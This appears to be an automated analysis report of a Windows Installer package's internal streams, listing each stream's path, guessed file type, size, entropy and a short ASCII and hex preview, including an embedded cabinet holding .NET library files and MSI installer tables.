                                  Stream Path:\x17191\x17334\x18305\x16678\x18469
                                  File Type:Microsoft Cabinet archive data, 3753879 bytes, 4 files
                                  Stream Size:3753879
                                  Entropy:7.997971703
                                  Base64 Encoded:True
                                  Data ASCII:M S C F . . . . . G 9 . . . . . , . . . . . . . . . . . . . . . . . . . . . . . H . . . . & > . . . . . . . . R . C . c o r e l i b . d l l . . . . . . & > . . . . R . C . M o n o H e l p e r . d l l . . . ) . . . J . . . . R . C . S y s t e m . d l l . . . / . . . t . . . . R . C . S y s t e m . X m l . d l l . . . . . N 9 . . C K . : . t . . u . o f . . . . J Z . 4 . . - . . . y < . Z . V . . . - . . m . . . . . . q . . . . . ^ . k . . e . 1 . 4 . . . . 6 M . . . . . . i h O . ` . . . ` . . . q
                                  Data Raw:4d 53 43 46 00 00 00 00 97 47 39 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 04 00 00 00 d2 04 00 00 a1 00 00 00 48 01 01 00 00 26 3e 00 00 00 00 00 00 00 b2 52 c3 43 20 00 63 6f 72 65 6c 69 62 2e 64 6c 6c 00 00 e8 0b 00 00 26 3e 00 00 00 b2 52 a4 43 20 00 4d 6f 6e 6f 48 65 6c 70 65 72 2e 64 6c 6c 00 00 fa 29 00 00 0e 4a 00 00 00 b2 52 a4 43 20 00 53 79 73 74 65 6d 2e 64 6c
                                  General
                                  Stream Path:\x18496\x15167\x17394\x17464\x17841
                                  File Type:data
                                  Stream Size:1424
                                  Entropy:4.90033147389
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . + . + . + . + . + . + . + . + . + . 5 . 5 . 5 . 9 . 9 . 9 . > . > . > . > . > . A . A . A . A . A . A . O . O . O . O . O . O . O . Q . Q . Q . V . V . V . V . V . V . V . V . V . X . X . Z . Z . \\ . \\ . \\ . ] . ] . ] . ^ . ^ . ^ . ^ . a . a . a . b . b . b . b . b . b . d . d . d . f . f . f . f . f . f . f . f . f . f . f . f . i . i . i . i . i . i . i . i . k . k . k . k . k . k . p . p . p . p . r . r . r . r . t . t . t . t . t . t .
                                  Data Raw:04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 20 00 20 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 35 00 35 00 35 00 39 00 39 00 39 00 3e 00 3e 00 3e 00 3e 00 3e 00 41 00 41 00 41 00 41 00 41 00 41 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 51 00 51 00 51 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 58 00 58 00
                                  General
                                  Stream Path:\x18496\x15498\x15359\x17388\x15208\x18098\x17393\x16690\x18471
                                  File Type:data
                                  Stream Size:12
                                  Entropy:2.61749246118
                                  Base64 Encoded:False
                                  Data ASCII:M . N . O . P . Q . . .
                                  Data Raw:4d 01 4e 01 4f 01 50 01 51 01 11 80
                                  General
                                  Stream Path:\x18496\x15518\x16925\x17915
                                  File Type:data
                                  Stream Size:444
                                  Entropy:5.30938688259
                                  Base64 Encoded:False
                                  Data ASCII:D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . $ . & . ( . * . , . . . 0 . 2 . 3 . 5 . 7 . 9 . ; . = . ? . A . C . D . F . H . I . K . M . O . Q . R . S . U . W . Y . [ . ] . _ . ` . a . c . e . g . i . k . m . o . q . s . u . w . y . { . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . .
                                  Data Raw:44 01 d2 06 d4 06 d5 06 d7 06 d9 06 db 06 dc 06 de 06 df 06 e0 06 e2 06 e3 06 e5 06 e7 06 e8 06 ea 06 ec 06 ee 06 f0 06 f2 06 f4 06 f5 06 f7 06 f9 06 fb 06 fd 06 ff 06 01 07 03 07 05 07 07 07 09 07 0a 07 0c 07 0e 07 10 07 12 07 14 07 16 07 18 07 1a 07 1c 07 1e 07 20 07 22 07 24 07 26 07 28 07 2a 07 2c 07 2e 07 30 07 32 07 33 07 35 07 37 07 39 07 3b 07 3d 07 3f 07 41 07 43 07 44 07
                                  General
                                  Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                  File Type:data
                                  Stream Size:85644
                                  Entropy:4.96011447798
                                  Base64 Encoded:True
                                  Data ASCII:A t t r i b u t e s P a t c h S i z e F i l e _ P a t c h T y p e A c t i o n C o n d i t i o n S e q u e n c e C o s t F i n a l i z e C o s t I n i t i a l i z e T a b l e N a m e I n s t a l l F i n a l i z e I n s t a l l I n i t i a l i z e I n s t a l l V a l i d a t e A d v t E x e c u t e S e q u e n c e C r e a t e S h o r t c u t s M s i P u b l i s h A s s e m b l i e s P u b l i s h C o m p o n e n t s P u b l i s h F e a t u r e s P u b l i s h P r o d u c t R e g i s t e r C l a s s I n f o R
                                  Data Raw:41 74 74 72 69 62 75 74 65 73 50 61 74 63 68 53 69 7a 65 46 69 6c 65 5f 50 61 74 63 68 54 79 70 65 41 63 74 69 6f 6e 43 6f 6e 64 69 74 69 6f 6e 53 65 71 75 65 6e 63 65 43 6f 73 74 46 69 6e 61 6c 69 7a 65 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 54 61 62 6c 65 4e 61 6d 65 49 6e 73 74 61 6c 6c 46 69 6e 61 6c 69 7a 65 49 6e 73 74 61 6c 6c 49 6e 69 74 69 61 6c 69 7a 65 49 6e 73 74 61
                                  General
                                  Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                  File Type:data
                                  Stream Size:7804
                                  Entropy:3.45148937466
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . . . . . m . . . ; . B . . . . . . . . . . . . . M . . . . . o . . . . . . . . . . .
                                  Data Raw:e4 04 00 00 0a 00 0e 00 09 00 02 00 05 00 02 00 05 00 0d 00 04 00 04 00 06 00 12 00 09 00 2b 00 08 00 10 00 0c 00 06 00 0e 00 06 00 00 00 00 00 05 00 02 00 04 00 06 00 0f 00 03 00 11 00 03 00 0f 00 04 00 13 00 07 00 0f 00 03 00 14 00 03 00 11 00 03 00 0f 00 03 00 0e 00 03 00 11 00 03 00 15 00 03 00 10 00 03 00 12 00 03 00 0c 00 05 00 07 00 02 00 06 00 02 00 06 00 02 00 0a 00 02 00
                                  General
                                  Stream Path:\x18496\x16255\x16740\x16943\x18486
                                  File Type:data
                                  Stream Size:78
                                  Entropy:3.72765014155
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . + . 5 . 9 . > . A . O . Q . V . X . Z . \\ . ] . ^ . a . b . d . f . i . k . p . r . t . x . ~ . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:04 00 07 00 11 00 1b 00 20 00 2b 00 35 00 39 00 3e 00 41 00 4f 00 51 00 56 00 58 00 5a 00 5c 00 5d 00 5e 00 61 00 62 00 64 00 66 00 69 00 6b 00 70 00 72 00 74 00 78 00 7e 00 7f 00 83 00 ab 00 b9 00 bc 00 da 00 fb 00 00 01 04 01 18 01
                                  General
                                  Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                  File Type:data
                                  Stream Size:4272
                                  Entropy:2.57636734591
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . + . + . + . + . + . + . + . + . + . 5 . 5 . 5 . 9 . 9 . 9 . > . > . > . > . > . A . A . A . A . A . A . O . O . O . O . O . O . O . Q . Q . Q . V . V . V . V . V . V . V . V . V . X . X . Z . Z . \\ . \\ . \\ . ] . ] . ] . ^ . ^ . ^ . ^ . a . a . a . b . b . b . b . b . b . d . d . d . f . f . f . f . f . f . f . f . f . f . f . f . i . i . i . i . i . i . i . i . k . k . k . k . k . k . p . p . p . p . r . r . r . r . t . t . t . t . t . t .
                                  Data Raw:04 00 04 00 04 00 04 00 04 00 04 00 07 00 07 00 07 00 11 00 11 00 11 00 1b 00 1b 00 20 00 20 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 2b 00 35 00 35 00 35 00 39 00 39 00 39 00 3e 00 3e 00 3e 00 3e 00 3e 00 41 00 41 00 41 00 41 00 41 00 41 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 4f 00 51 00 51 00 51 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 58 00 58 00
                                  General
                                  Stream Path:\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
                                  File Type:data
                                  Stream Size:20
                                  Entropy:2.89546184424
                                  Base64 Encoded:False
                                  Data ASCII:^ . . . . . . . . . . . . . . . . . . .
                                  Data Raw:5e 01 af 06 c1 06 c3 06 c5 06 c7 06 c8 06 c2 06 c4 06 c6 06
                                  General
                                  Stream Path:\x18496\x16667\x17191\x15090\x17912\x17591\x18481
                                  File Type:data
                                  Stream Size:36
                                  Entropy:3.62798680688
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . @ . @ . . . . . . . . . . . . .
                                  Data Raw:9f 01 9f 01 01 80 02 80 a0 01 cb 06 05 80 05 80 05 80 19 80 40 81 40 81 14 80 0f 80 ca 06 cc 06 00 00 00 00
                                  General
                                  Stream Path:\x18496\x16778\x17207\x17522\x16925\x17915
                                  File Type:data
                                  Stream Size:450
                                  Entropy:4.73721029883
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . > . C . . . . . . . . . . . . . . . . . . . . . . . . . ! . $ . & . ) . , . 1 . 5 . 8 . : . ; . > . A . B . E . G . I . N . Q . U . W . Y . ] . b . e . h . j . q . t . w . y . | . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . 7 . L . . . 3 . S . [ . _ . ` . / . m . o . . . M . . . . . . . . . . . . . . . . . . . . . . . . . " . % . ' . * . - . 2 . 6 . 9 . 6 . < . ? . 7 . C . F . H . J . O . R . V . X . Z . ^ . c . f . i . k . r .
                                  Data Raw:09 00 0a 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 3e 01 43 01 ff 01 01 02 04 02 08 02 0d 02 0f 02 12 02 15 02 18 02 1b 02 1d 02 1e 02 21 02 24 02 26 02 29 02 2c 02 31 02 35 02 38 02 3a 02 3b 02 3e 02 41 02 42 02 45 02 47 02 49 02 4e 02 51 02 55 02 57 02 59 02 5d 02 62 02 65 02 68 02 6a 02 71 02 74 02 77 02 79 02 7c 02 7e 02 81 02 83 02 85 02 87 02 8a 02 8c 02
                                  General
                                  Stream Path:\x18496\x16786\x17522
                                  File Type:data
                                  Stream Size:4
                                  Entropy:1.5
                                  Base64 Encoded:False
                                  Data ASCII:i . . .
                                  Data Raw:69 01 01 00
                                  General
                                  Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                  File Type:data
                                  Stream Size:48
                                  Entropy:3.38186998233
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . A . G . . . . . . . . . . . . . . . . . . . . . . . . x . < . . . . .
                                  Data Raw:09 00 0a 00 0e 00 0f 00 10 00 18 02 41 02 47 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 3c 8f 84 83 a0 8f
                                  General
                                  Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                  File Type:data
                                  Stream Size:66
                                  Entropy:3.77043919502
                                  Base64 Encoded:False
                                  Data ASCII:. . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:09 00 0a 00 41 02 a4 02 a5 02 a6 02 a7 02 a8 02 a9 02 aa 02 ab 02 00 00 00 00 00 00 00 00 00 00 51 01 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 84 83 00 85 ce 84 01 80 14 85 ff 7f fd 7f 8c 80 fe 7f
                                  General
                                  Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                  File Type:data
                                  Stream Size:84
                                  Entropy:3.43893323285
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . j . 8 . . . . . . . \\ . $ . . .
                                  Data Raw:09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 94 91 6a 98 38 98 9c 98 00 99 f8 91 5c 92 24 93 c0 92
                                  General
                                  Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                  File Type:data
                                  Stream Size:28
                                  Entropy:2.20183873051
                                  Base64 Encoded:False
                                  Data ASCII:# . # . # . # . # . # . # . $ . % . & . ' . ( . ) . * .
                                  Data Raw:23 00 23 00 23 00 23 00 23 00 23 00 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2a 00
                                  General
                                  Stream Path:\x18496\x16911\x17892\x17784\x18472
                                  File Type:data
                                  Stream Size:16
                                  Entropy:2.22460175271
                                  Base64 Encoded:False
                                  Data ASCII:# . . . # . 4 . . . . . $ . . .
                                  Data Raw:23 00 00 00 23 00 34 00 01 80 01 80 24 00 00 80
                                  General
                                  Stream Path:\x18496\x16918\x17191\x18468
                                  File Type:MIPSEB Ucode
                                  Stream Size:14
                                  Entropy:1.95021206491
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . .
                                  Data Raw:01 80 04 00 00 80 00 00 c9 06 00 00 00 00
                                  General
                                  Stream Path:\x18496\x16923\x17194\x17910\x18229
                                  File Type:SysEx File -
                                  Stream Size:24
                                  Entropy:3.10538854221
                                  Base64 Encoded:False
                                  Data ASCII:. . 9 . . . . . : . : . . . 9 . < . ; . % . % .
                                  Data Raw:f0 00 39 01 ff 7f ff 7f 3a 01 3a 01 f0 00 39 01 3c 01 3b 01 25 00 25 00
                                  General
                                  Stream Path:\x18496\x16925\x17915\x17884\x17404\x18472
                                  File Type:data
                                  Stream Size:48
                                  Entropy:3.09028891162
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:d8 01 cd 06 d0 06 d1 06 cf 06 ce 06 cf 06 cf 06 08 80 0d 80 08 80 08 80 00 00 00 80 00 00 00 80 00 00 00 80 ff ff ff 80 00 80 01 80 01 80 00 80
                                  General
                                  Stream Path:\x18496\x17100\x16808\x15086\x18162
                                  File Type:data
                                  Stream Size:12
                                  Entropy:2.35538854221
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . Q . Q . Q .
                                  Data Raw:f1 01 bb 02 bc 02 51 01 51 01 51 01
                                  General
                                  Stream Path:\x18496\x17163\x16689\x18229
                                  File Type:data
                                  Stream Size:108
                                  Entropy:3.11492446487
                                  Base64 Encoded:False
                                  Data ASCII:k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:6b 01 d4 01 d6 01 dc 01 de 01 e0 01 e2 01 e4 01 e6 01 e8 01 ec 01 f5 01 ac 02 ad 02 ae 02 af 02 b0 02 b1 02 b2 02 b3 02 b4 02 b5 02 b6 02 b7 02 b8 02 b9 02 ba 02 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00
                                  General
                                  Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                  File Type:data
                                  Stream Size:30
                                  Entropy:3.44441382958
                                  Base64 Encoded:False
                                  Data ASCII:$ . O . . . . . . . . . . . $ . . . . . . . ' . . . . . . .
                                  Data Raw:24 00 4f 01 be 02 fd 02 14 04 fd 02 14 04 24 00 00 00 fd 02 16 04 27 00 17 04 13 04 15 04
                                  General
                                  Stream Path:\x18496\x17165\x17380\x17074
                                  File Type:data
                                  Stream Size:616
                                  Entropy:4.26905156607
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . S . ] . a . e . h . q . s . w . z . { . . . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . . . r . r . r . r . r . r . r . r . r . ( . r . r . r . . . r . r . r . r . r . r . r . r . r . r . r . r . . . i . . . . . . . . . . . . . . . . . . . G . . . . . . . U . . .
                                  Data Raw:9a 01 a4 02 a5 02 a8 02 a9 02 aa 02 ab 02 c5 02 dc 02 f4 02 f8 02 fc 02 0c 03 11 03 13 03 1b 03 30 03 53 03 5d 03 61 03 65 03 68 03 71 03 73 03 77 03 7a 03 7b 03 80 03 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80
                                  General
                                  Stream Path:\x18496\x17167\x16943
                                  File Type:data
                                  Stream Size:80
                                  Entropy:3.33010705294
                                  Base64 Encoded:False
                                  Data ASCII:& . ( . ) . * . & . ( . ) . * . & . . . ) . . . . & > . . . . . . . ) . . . / . . . . . . . . . U . . . U . U . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:26 00 28 00 29 00 2a 00 26 00 28 00 29 00 2a 00 26 00 a1 06 29 00 a2 06 00 26 3e 80 00 e8 0b 80 00 fa 29 80 00 e0 2f 80 a0 06 00 00 a0 06 a0 06 55 01 00 00 55 01 55 01 00 80 00 80 00 80 00 80 01 00 00 80 02 00 00 80 03 00 00 80 04 00 00 80
                                  General
                                  Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                  File Type:data
                                  Stream Size:510
                                  Entropy:5.8183181554
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . = . > . A . C . . . . . . . . . . . . . . . . . ! . $ . 1 . ; . > . A . B . G . N . Q . U . W . ] . b . e . h . j . q . t . w . y . | . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 3d 01 3e 01 41 01 43 01 ff 01 01 02 04 02 0f 02 15 02 1b 02 1d 02 1e 02 21 02 24 02 31 02 3b 02 3e 02 41 02 42 02 47 02 4e 02 51 02 55 02 57 02 5d 02 62 02 65 02 68 02 6a 02 71 02 74 02 77 02 79 02 7c 02 7e 02 81 02 83 02 85 02 87 02 8a 02 8c 02 8e 02 90 02 92 02 94 02 96 02 98 02 9b 02 9d 02 9f 02
                                  General
                                  Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                  File Type:data
                                  Stream Size:204
                                  Entropy:5.26148780813
                                  Base64 Encoded:False
                                  Data ASCII:. . . . = . > . A . C . A . B . N . . . . . . . . . . . . . . . h . q . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . d . . . . . . . . . L . . . . . . . . . K . . . . . . . . . . . 5 . 4 . c . . . . . . . f . 6 . 3 . . . . . . . . . . . . .
                                  Data Raw:09 00 0a 00 3d 01 3e 01 41 01 43 01 41 02 42 02 4e 02 a4 02 a7 02 a8 02 a9 02 aa 02 ab 02 f4 02 68 03 71 03 7b 03 d0 03 d2 03 d5 03 dd 03 e9 03 f1 03 f3 03 f6 03 f7 03 05 04 07 04 0c 04 0d 04 0e 04 0f 04 00 00 00 00 00 00 00 00 b8 06 ae 06 00 00 00 00 00 00 00 00 00 00 be 06 00 00 00 00 bf 06 97 03 9a 03 9b 03 95 03 00 00 00 00 00 00 c0 06 9b 03 a4 06 d6 03 00 00 00 00 a4 06 b9 06
                                  General
                                  Stream Path:\x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934
                                  File Type:data
                                  Stream Size:66
                                  Entropy:4.16389459119
                                  Base64 Encoded:False
                                  Data ASCII:= . > . @ . A . C . D . F . G . I . J . K . . . ? . ? . B . ? . E . E . H . H . E . L . . . . . , . T . ^ . . . . . X . . . . . .
                                  Data Raw:3d 01 3e 01 40 01 41 01 43 01 44 01 46 01 47 01 49 01 4a 01 4b 01 00 00 3f 01 3f 01 42 01 3f 01 45 01 45 01 48 01 48 01 45 01 4c 01 97 80 fa 80 2c 81 54 81 5e 81 90 81 c2 81 58 82 8a 82 bc 82 20 83
                                  General
                                  Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                  File Type:data
                                  Stream Size:84
                                  Entropy:3.15613264549
                                  Base64 Encoded:False
                                  Data ASCII:$ . % . & . ' . ( . ) . * . . . . . . . . . . . . . . . $ . $ . . . O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . ( . ) . * .
                                  Data Raw:24 00 25 00 26 00 27 00 28 00 29 00 2a 00 bf 02 c1 02 bd 02 c4 02 c2 02 c0 02 c3 02 24 00 24 00 be 02 4f 01 be 02 be 02 be 02 00 80 04 81 00 80 00 80 00 81 00 80 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 26 00 00 00 28 00 29 00 2a 00
                                  General
                                  Stream Path:\x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522
                                  File Type:data
                                  Stream Size:72
                                  Entropy:3.28528343517
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . C . E . G . I . O . P . . . # . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:a8 02 a8 02 a8 02 a8 02 a9 02 a9 02 1b 03 1b 03 1b 03 43 03 45 03 47 03 49 03 4f 03 50 03 cd 02 23 03 25 03 8e 03 8e 03 8e 03 8e 03 92 03 92 03 8e 03 8e 03 8e 03 91 03 91 03 90 03 90 03 93 03 93 03 8f 03 8f 03 8f 03
                                  General
                                  Stream Path:\x18496\x17548\x17905\x17589\x15279\x16953\x17905
                                  File Type:data
                                  Stream Size:1536
                                  Entropy:4.88533384289
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . S . S . S . ] . ] . ] . a . e . e . e . h . h . h . h . q . q . q . q . q . q . s . s . s . s . s . s . s . w . w . w . w . w . w . w . w . z . z . z . z . z . z . z . z . z . z . z . z . { . { . . .
                                  Data Raw:9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 a4 02 a5 02 a5 02 a5 02 a8 02 a8 02 a8 02 a8 02 a9 02 a9 02 a9 02 aa 02 ab 02 ab 02 c5 02 c5 02 c5 02 c5 02 c5 02 c5 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 dc 02 f4 02 f4 02 f4 02 f8 02 fc 02 fc 02 fc 02 fc 02 fc 02 fc 02 0c 03 0c 03 0c 03 0c 03 0c 03 11 03 11 03
                                  General
                                  Stream Path:\x18496\x17548\x17905\x17589\x18479
                                  File Type:data
                                  Stream Size:7280
                                  Entropy:4.54500622406
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 9a 01 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a4 02 a5 02 a5 02 a5 02 a5 02 a5 02 a5 02 a5 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a8 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 a9 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 aa 02 ab 02 ab 02 ab 02 ab 02 ab 02 ab 02
                                  General
                                  Stream Path:\x18496\x17630\x17770\x16868\x18472
                                  File Type:data
                                  Stream Size:32
                                  Entropy:2.76201589562
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:8a 01 8a 01 85 01 9d 07 00 00 85 01 00 00 00 00 02 00 00 80 01 01 00 80 00 00 00 00 c0 06 9e 07
                                  General
                                  Stream Path:\x18496\x17740\x16680\x16951\x17551\x16879\x17768
                                  File Type:data
                                  Stream Size:8
                                  Entropy:2.15563906223
                                  Base64 Encoded:False
                                  Data ASCII:$ . O . $ . ' .
                                  Data Raw:24 00 4f 01 24 00 27 00
                                  General
                                  Stream Path:\x18496\x17742\x17589\x18485
                                  File Type:data
                                  Stream Size:2572
                                  Entropy:6.5134680762
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . M . . . . . . . . . . . . . . . . . . . . . . . . ! . " . # . $ . % . & . ' . ( . ) . * . + . , . - . . . / . 0 . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . y . z . { . | . } . ~ . . . . . . . . . . . . . . . . . A . B . C . D . E . F . G . H . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . n . o . p .
                                  Data Raw:00 80 01 80 02 80 03 80 04 80 05 80 06 80 07 80 08 80 09 80 0a 80 0b 80 0c 80 0d 80 0e 80 0f 80 10 80 11 80 12 80 13 80 14 80 15 80 16 80 17 80 20 80 21 80 e9 83 4d 84 15 85 16 85 17 85 18 85 19 85 1a 85 1b 85 1c 85 1d 85 1e 85 1f 85 20 85 21 85 22 85 23 85 24 85 25 85 26 85 27 85 28 85 29 85 2a 85 2b 85 2c 85 2d 85 2e 85 2f 85 30 85 31 85 32 85 33 85 34 85 35 85 36 85 37 85 38 85
                                  General
                                  Stream Path:\x18496\x17753\x17650\x17768\x18231
                                  File Type:PDP-11 separate I&D executable not stripped - version 1
                                  Stream Size:388
                                  Entropy:4.67624508089
                                  Base64 Encoded:False
                                  Data ASCII:. . % . R . T . V . X . Y . [ . ] . _ . a . b . d . f . h . j . l . m . o . p . r . s . t . u . w . x . z . | . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . U . W . Q . Z . \\ . ^ . ` . W . c . e . g . i . k . Q . n . W . q . Q . Q . Q . v . W . y . { . } . . . . . . .
